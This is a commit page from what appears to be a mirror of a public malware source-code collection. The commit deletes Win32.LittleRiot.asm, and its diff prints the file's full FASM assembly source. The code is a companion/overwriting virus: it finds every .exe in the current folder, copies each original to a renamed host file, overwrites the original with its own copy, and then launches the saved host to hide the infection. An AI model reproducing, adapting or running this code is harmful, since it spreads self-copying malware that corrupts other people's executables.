Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity

Delete Win32.LittleRiot.asm

Browse Source 
not vx
This commit is contained in:
vxunderground 2020-10-28 23:24:33 -05:00 committed by GitHub
parent 947d94e90a
commit cf62f2c609
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
Win32/Win32.LittleRiot.asm
View File

@ -1,54 +0,0 @@
include "%fasminc%\win32ax.inc"
LittleRiot: invoke GetCommandLine
mov ebx, eax
inc ebx
xor ecx, ecx
GetEndCmd: cmp byte [ebx], '"'
je HaveEndCmd
inc ebx
inc ecx
jmp GetEndCmd
HaveEndCmd: mov byte [ebx], 0
sub ebx,ecx
push ebx
invoke FindFirstFile, ExeFiles, Win32FindData
mov dword [FindHandle], eax
FindMore: cmp eax, 0
je ExecuteHost
mov ebx, Win32FindData.cFileName
call GetHostName
invoke CopyFile, Win32FindData.cFileName, HostName, 1
cmp eax, 0
je FindNextVictim
pop ebx
invoke CopyFile, ebx, Win32FindData.cFileName, 0
push ebx
FindNextVictim: invoke FindNextFile, dword [FindHandle], Win32FindData
jmp FindMore
ExecuteHost: pop ebx
call GetHostName
invoke WinExec, HostName, SW_SHOWNORMAL
ret
GetHostName : cmp byte [ebx], 0
je RenameHostName
inc ebx
jmp GetHostName
RenameHostName: sub ebx, 8
mov esi, ebx
mov edi, HostName
mov ecx, 5
rep movsb
ret
data import
library kernel32, "KERNEL32.DLL"
import kernel32,\
GetCommandLine, "GetCommandLineA",\
FindFirstFile, "FindFirstFileA",\
FindNextFile, "FindNextFileA",\
CopyFile, "CopyFileA",\
WinExec, "WinExec"
end data
ExeFiles db "*.exe",0
FindHandle dd ?
Win32FindData FINDDATA
HostName rb 6